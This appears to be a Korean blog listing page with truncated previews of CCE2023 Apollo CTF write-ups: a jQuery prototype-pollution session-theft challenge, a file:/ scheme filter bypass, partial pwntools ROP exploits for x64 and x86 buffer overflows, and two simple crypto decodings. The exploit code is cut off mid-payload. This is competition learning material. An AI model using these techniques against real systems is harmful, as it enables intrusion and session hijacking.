IT/CTF

CCE2023 APOLLO WEB HACKING [100] - GS25

Description Tetris is so much fun. Tetris server Robot server prototype pollution으로 javascript를 서버(관리자페이지)에 보내서 세션을 탈취해오는 것이 목적인 문제 Client 단에서 jquery 3.1.1 버전을 사용하고 있었고 해당 버전에는 Javascript Prototype Pollution 취약점이 존재 https://snyk.io/vuln/SNYK-JS-JQUERY-174006 Snyk Vulnerability Database | Snyk The most comprehensive, accurate, and timely database for open source vulnerabilities. security.snyk.io ..

2023. 6. 6. 13:09

IT/CTF

CCE2023 APOLLO WEB HACKING [100] - Request forgery

Description Read Me http://prob2.cstec.kr:5583 입력부에서 file스키마("file://")를 필터링 중이어서 file:/로 우회 플래그의 위치는 추측하여 찾아봐야했다.

2023. 6. 6. 11:25

IT/CTF

CCE2023 APOLLO PWNABLE [100] - X64_ROP

Description X64_ ROP nc prob2.cstec.kr 5339 64비트 ROP 문제. 버퍼 오버플로 취약점이 존재하며, PIE 가 꺼져 있다. 익스플로잇 작성 #!/usr/bin/python3 from pwn import * p = remote("prob2.cstec.kr", 5339) e = ELF("./x64_rop") l = ELF("./libc.so.6") p.sendlineafter(b"Enter choice : ", b"1") ret = 0x000000000040101a rdi = 0x0000000000401203 buf = b"" buf += b'A' * 16 buf += b'B' * 8 buf += p64(rdi) buf += p64(e.got["puts"]) buf += ..

2023. 6. 6. 11:17

IT/CTF

CCE2023 APOLLO PWNABLE [100] - X86_ROP

Description X86 ROP nc prob2.cstec.kr 5340 32비트 ROP 문제. 버퍼 오버플로 취약점이 존재하며, PIE가 꺼져 있다. #!/usr/bin/python3 from pwn import * p = remote("prob2.cstec.kr", 5340) e = ELF("./x86_rop") l = ELF("./libc.so.6") p.sendlineafter(b"Enter choice : ", b"1") r = 0x000000000040101a pr = 0x080491e5 rdi = 0x0000000000401203 buf = b"" buf += b'A' * 24 buf += b'B' * 4 buf += p32(e.plt["puts"]) buf += p32(pr) buf +..

2023. 6. 6. 11:10

IT/CTF

CCE2023 APOLLO CRYPTO [100] - Base64?

Description 커스텀 키 테이블을 이용한 base64 encode_flag.txt 7nqRmsVR7AD/mhOpmsyNnHyp7YO+mHORmHOAnHDpihFl95== data.txt How many special people change? How many lives are livin' strange? Where were you while we were getting high? Slowly walkin' down the hall Faster than a cannonball Where were you while we were getting high? Someday you will find me Caught beneath the landslide In a champagne supernova in t..

2023. 6. 6. 10:24

IT/CTF

CCE2023 APOLLO CRYPTO [100] - ROT

flag를 입력할 수 있도록 나오는 페이지 존재 그리고 같이 첨부되는 html 파일 암호화된 '2A@==@3LC~Ecf0u@CE*0DtGt?0C@Ecf0!2Dcf502&9N'를 ROT47로 디코딩 flag 획득 입력 페이지에 입력하면 아래와 같이 나온다.

2023. 6. 4. 09:48